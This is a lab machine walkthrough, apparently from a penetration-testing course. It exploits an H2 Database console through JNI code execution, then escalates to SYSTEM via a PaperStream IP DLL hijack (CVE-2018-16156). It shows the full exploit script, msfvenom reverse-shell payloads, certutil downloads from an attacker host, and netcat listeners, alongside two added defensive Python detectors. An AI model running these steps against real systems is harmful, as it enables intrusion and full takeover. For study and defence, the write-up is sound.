TCP Ports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 14:27 +08
Nmap scan report for 192.168.105.66
Host is up (0.039s latency).
Not shown: 46501 closed tcp ports (conn-refused), 19020 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
7680/tcp  open  pando-pub
8082/tcp  open  blackice-alerts
9092/tcp  open  XmlIpcRegSvc
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 9.90 seconds

TCP Service Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 14:27 +08
Nmap scan report for 192.168.105.66
Host is up (0.039s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8082/tcp  open  http          H2 database http console
|_http-title: H2 Console
9092/tcp  open  XmlIpcRegSvc?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-26T06:30:11
|_  start_date: N/A
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.56 seconds

Plenty of ports here, but from a brief look at the Nmap service scan we don’t see much apart from the HTTP services on ports 80 and 8082.

Port 80

A quick look at port 80 shows only the H2 Database Engine documentation and nothing else: http://192.168.105.66/html/main.html

Port 8082

Port 8082 serves the H2 Database software itself. Navigating to http://192.168.105.66:8082/ immediately redirects us to the login page and hands us a session ID.

http://192.168.105.66:8082/login.jsp?jsessionid=34d0c452e1daa553f4b6dcac2dabc08d

H2 Console

Without changing any of the default connection settings, clicking Connect ’logs us in’ to the console.

The left sidebar states the version: 1.4.199

There are a few searchsploit results for H2 Database. We always want to try the RCE first, but that one targets an older version, so we try the JNI Code Execution entry instead, which looks promising as well.

Exploit

https://www.exploit-db.com/exploits/49384

Snippet of the payloads:

Without modifying the payloads, executing them one by one in sequence gives us the output of whoami: the user tony on the machine jacko.

Reverse Shell

Let’s craft a reverse shell and then upload it to tony’s directory on the target machine.

Generate shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.169 LPORT=445 -f exe -o reverse.exe

Inject this command into the web console by replacing the whoami command from the exploit:

certutil -urlcache -split -f http://192.168.45.169/reverse.exe C:\\Users\\tony\\reverse.exe

Then we start our nc listener and execute the reverse shell with the command below:

C:\\Users\\tony\\reverse.exe

Full payload:

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');

Shell as tony

sudo wrapnc 445
[sudo] password for hans:
listening on [any] 445 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.105.66] 50266
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\H2\service>
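As an added defender-side example (not from the original write-up), the following Python flags the process-creation pattern the steps above leave behind: the H2 service’s JVM spawning certutil with -urlcache and a remote URL, and then an executable from a user profile. The event records are constructed; the field names follow Sysmon Event ID 1, and the java.exe and wrapper.exe paths are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields). They are made up
# for this example, not logs captured from the target, and mirror the page's sequence:
# the H2 JVM runs certutil to fetch reverse.exe, then runs it from tony's profile.
# The JVM path and the wrapper.exe parent are assumptions. The last event is benign.
SAMPLE_EVENTS = [
    {"User": "jacko\\tony", "ParentImage": r"C:\Program Files (x86)\H2\service\wrapper.exe",
     "Image": r"C:\Program Files\Java\jre\bin\java.exe",
     "CommandLine": "java -cp h2-1.4.199.jar org.h2.tools.Server -web -webAllowOthers"},
    {"User": "jacko\\tony", "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://192.168.45.169/reverse.exe C:\Users\tony\reverse.exe"},
    {"User": "jacko\\tony", "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "Image": r"C:\Users\tony\reverse.exe", "CommandLine": r"C:\Users\tony\reverse.exe"},
    {"User": "jacko\\tony", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile C:\\Users\\tony\\report.pdf SHA256"},
]

DB_RUNTIMES = ("java.exe", "javaw.exe")      # the process that hosts the H2 server
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the detection rules an event matches (empty if benign)."""
    hits = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    # Rule 1: certutil used as a downloader (-urlcache plus a remote URL), as on this page.
    if image == "certutil.exe" and "-urlcache" in cmd.lower() and URL_RE.search(cmd):
        hits.append("certutil_download")
    # Rule 2: the database JVM spawning any child; a DB engine should not be a parent.
    if parent in DB_RUNTIMES:
        hits.append("h2_jvm_child_process")
    # Rule 3: an executable launched from under a user profile directory.
    if re.match(r"(?i)^c:\\users\\[^\\]+\\", event["Image"]):
        hits.append("exec_from_user_profile")
    return hits

def scan(events):
    """Return (event index, matched rules) for every event matching at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"], "->", ", ".join(rules))
```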

Set Path

I couldn’t execute basic commands and wondered why.

C:\Program Files (x86)\H2\service>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files (x86)\H2\service>dir
 Volume in drive C has no label.
 Volume Serial Number is AC2F-6399

 Directory of C:\Program Files (x86)\H2\service

04/27/2020  08:00 PM    <DIR>          .
04/27/2020  08:00 PM    <DIR>          ..
02/28/2017  05:07 AM             1,659 0_run_server_debug.bat
02/28/2017  05:07 AM             1,501 1_install_service.bat
02/28/2017  05:07 AM                66 2_start_service.bat
02/28/2017  05:07 AM                29 3_start_browser.bat
02/28/2017  05:07 AM                27 4_stop_service.bat
02/28/2017  05:07 AM             1,294 5_uninstall_service.bat
03/18/2018  11:34 AM             2,615 serviceWrapperLicense.txt
04/27/2020  01:05 PM             3,737 wrapper.conf
02/28/2017  05:07 AM            81,920 wrapper.dll
02/28/2017  05:07 AM           204,800 wrapper.exe
02/28/2017  05:07 AM            83,820 wrapper.jar
04/27/2020  08:18 PM             4,573 wrapper.log
              12 File(s)        386,041 bytes
               2 Dir(s)   7,205,875,712 bytes free

C:\Program Files (x86)\H2\service>hostname
'hostname' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files (x86)\H2\service>hostname.exe
'hostname.exe' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>set
...<truncated>...
Path=C:\Users\tony\AppData\Local\Microsoft\WindowsApps;
...<truncated>...

The PATH variable contains only that one directory, so cmd never searches System32. To fix this, we append System32 to PATH (the separator is a semicolon):

set PATH=%PATH%;C:\Windows\System32

Now I can run the commands as usual.

C:\Program Files (x86)\H2\service>set PATH=%PATH%;C:\Windows\System32

C:\Program Files (x86)\H2\service>whoami
jacko\tony

C:\Program Files (x86)\H2\service>hostname
jacko

local.txt

C:\Program Files (x86)\H2\service>cd c:\users\tony\desktop

c:\Users\tony\Desktop>type local.txt
47b489c923c280c755bfd4a14fee933e

Privilege Tokens

c:\Users\tony\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

SeImpersonatePrivilege is enabled. I tried exploiting it with GodPotato, but that doesn’t seem to work.

Looking at the Program Files directory, I see an interesting program called PaperStream IP.

C:\Users\tony>cd C:\program files (x86)

C:\Program Files (x86)>dir
 Volume in drive C has no label.
 Volume Serial Number is AC2F-6399

 Directory of C:\Program Files (x86)

04/27/2020  08:01 PM    <DIR>          .
04/27/2020  08:01 PM    <DIR>          ..
04/27/2020  07:59 PM    <DIR>          Common Files
04/27/2020  08:01 PM    <DIR>          fiScanner
04/27/2020  07:59 PM    <DIR>          H2
05/03/2022  05:22 PM    <DIR>          Internet Explorer
03/18/2019  08:52 PM    <DIR>          Microsoft.NET
04/27/2020  08:01 PM    <DIR>          PaperStream IP
03/18/2019  10:20 PM    <DIR>          Windows Defender
03/18/2019  08:52 PM    <DIR>          Windows Mail
04/24/2020  08:50 AM    <DIR>          Windows Media Player
03/18/2019  10:23 PM    <DIR>          Windows Multimedia Platform
03/18/2019  09:02 PM    <DIR>          Windows NT
03/18/2019  10:23 PM    <DIR>          Windows Photo Viewer
03/18/2019  10:23 PM    <DIR>          Windows Portable Devices
03/18/2019  08:52 PM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              16 Dir(s)   7,205,625,856 bytes free

searchsploit gave me a privilege escalation (PE) exploit in the form of a PowerShell script.

Exploit

PowerShell Script

# Exploit Title: PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
# Exploit Author: 1F98D
# Original Author: securifera
# Date: 12 May 2020
# Vendor Homepage: https://www.fujitsu.com/global/support/products/computing/peripheral/scanners/fi/software/fi6x30-fi6x40-ps-ip-twain32.html
# CVE: CVE-2018-16156
# Tested on: Windows 10 x64
# References:
# https://www.securifera.com/advisories/cve-2018-16156/
# https://github.com/securifera/CVE-2018-16156-Exploit

# A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
# the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
# for a writable location, copies the specified DLL to that location and then
# triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
# named pipe.

$ErrorActionPreference = "Stop"

# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=tun0 LPORT=4444
$PayloadFile = "C:\Users\tony\shell.dll"

if ((Test-Path $PayloadFile) -eq $false) {
    Write-Host "$PayloadFile not found, did you forget to upload it?"
    Exit 1
}

# Find Writable Location
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
    try {
        [IO.File]::OpenWrite("$_\x.txt").close()
        Remove-Item "$_\x.txt"
        $WritableDirectory = $_
    } catch {}
}

if ($WritableDirectory -eq $null) {
    Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
    Exit 1
}

Write-Host "Writable location found, copying payload to $WritableDirectory"
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"

Write-Host "Payload copied, triggering..."
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
    $client.Connect()
    $reader = New-Object System.IO.StreamReader($client)
    $writer = New-Object System.IO.StreamWriter($client)
    $writer.AutoFlush = $true
    $writer.Write("ChangeUninstallString")
    $reader.ReadLine()
} finally {
    $client.Dispose()
}

Write-Host "Payload triggered"

This script exploits a DLL hijack vulnerability, hence, we will need to generate a DLL payload.
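The only precondition the script relies on is a PATH directory that any user can write to, which is exactly what a defender should audit for. The following Python is an added example, not part of the exploit or of this write-up: it splits a Windows PATH value (handling the empty entry and trailing separator seen in the Set Path section) and parses icacls-style output per directory to report those writable by broad identities. The PATH value and icacls lines are constructed; on a real host the icacls output would come from running icacls on each directory of the HKLM PATH the script reads.

```python
import re

# Constructed sample data, not captured from the target: a PATH value combining the
# directories seen on this page, and icacls-style output for two of them.
# C:\JavaTemp is the writable location the exploit reported.
SAMPLE_PATH = ("C:\\Users\\tony\\AppData\\Local\\Microsoft\\WindowsApps;;"
               "C:\\Windows\\System32;C:\\JavaTemp\\")
SAMPLE_ICACLS = {
    r"C:\Windows\System32": [
        r"C:\Windows\System32 NT SERVICE\TrustedInstaller:(F)",
        r"                    BUILTIN\Administrators:(M)",
        r"                    BUILTIN\Users:(RX)",
    ],
    r"C:\JavaTemp": [
        r"C:\JavaTemp NT AUTHORITY\SYSTEM:(OI)(CI)(F)",
        r"            BUILTIN\Administrators:(OI)(CI)(F)",
        r"            BUILTIN\Users:(OI)(CI)(F)",
    ],
}

# Identities every local account effectively holds; a write grant to one of these
# lets any user plant a DLL such as UninOldIS.dll in that directory.
BROAD_IDENTITIES = {"everyone", r"builtin\users",
                    r"nt authority\authenticated users", r"nt authority\interactive"}
WRITE_SIMPLE = {"F", "M", "W"}                  # icacls simple rights that allow writing
WRITE_SPECIFIC = {"WD", "AD", "GW", "GA", "DC"}  # icacls specific rights that allow writing

def split_path(path_value):
    """Split a Windows PATH value; drop empty entries (';;') and trailing backslashes."""
    return [p.strip().rstrip("\\") for p in path_value.split(";") if p.strip()]

def ace_grants_write(rights):
    """True if any parenthesised icacls rights token permits writing."""
    for token in re.findall(r"\(([^)]*)\)", rights):
        parts = {p.strip().upper() for p in token.split(",")}
        if parts & WRITE_SIMPLE or parts & WRITE_SPECIFIC:
            return True
    return False

def writable_by_any_user(directory, icacls_lines):
    """True if an ACE in the icacls output grants write access to a broad identity."""
    for line in icacls_lines:
        entry = line.strip()
        if entry.lower().startswith(directory.lower()):   # first line carries the path
            entry = entry[len(directory):].strip()
        identity, _, rights = entry.partition(":")
        if identity.strip().lower() in BROAD_IDENTITIES and ace_grants_write(rights):
            return True
    return False

def audit_path(path_value, icacls_by_dir):
    """Return the PATH directories where any local user can write (DLL planting risk)."""
    return [d for d in split_path(path_value)
            if writable_by_any_user(d, icacls_by_dir.get(d, []))]
```

Directories with no icacls output in the sample (here the WindowsApps entry) are treated as not writable, so a real audit must supply output for every PATH entry.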

Check PowerShell

Before running the exploit, let’s see if we can run PowerShell.

C:\Program Files (x86)>powershell
'powershell' is not recognized as an internal or external command,
operable program or batch file.

Nope, so let’s locate PowerShell.

C:\Windows\System32>dir /s *powershell.exe
 Volume in drive C has no label.
 Volume Serial Number is AC2F-6399

 Directory of C:\Windows\System32\WindowsPowerShell\v1.0

03/18/2019  08:46 PM           451,584 powershell.exe
               1 File(s)        451,584 bytes

     Total Files Listed:
               1 File(s)        451,584 bytes
               0 Dir(s)   7,205,421,056 bytes free

And then add that to the Path variable.

C:\Windows\System32>set Path=%Path%C:\Windows\System32\WindowsPowerShell\v1.0;
C:\Windows\System32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Windows\System32>

Now we can run PowerShell.

Generate DLL Payload

Now, we can proceed to generate the shell.dll as mentioned by the exploit.

msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=tun0 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll

NOTE: the example msfvenom command in the exploit generates an x64 DLL, but the vulnerable application on the target is x86 (it lives under the Program Files (x86) folder), so use the non-x64 payload.

Now, we go to tony’s directory and upload the shell.dll and powershell script.

PS C:\Windows\System32> cd C:/users/tony
PS C:\users\tony> certutil -urlcache -f http://192.168.45.169/shell.dll shell.dll
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\users\tony> certutil -urlcache -f http://192.168.45.169/exploit.ps1 exploit.ps1
****  Online  ****
CertUtil: -URLCache command completed successfully.

Escalate

Finally, we simply execute the PowerShell script.

PS C:\users\tony> ./exploit.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...

Our nc listener then catches a system shell.

wrapnc 4444
listening on [any] 4444 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.105.66] 50304
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type proof.txt
2463fc71aee4d819fdd72877c3f838ad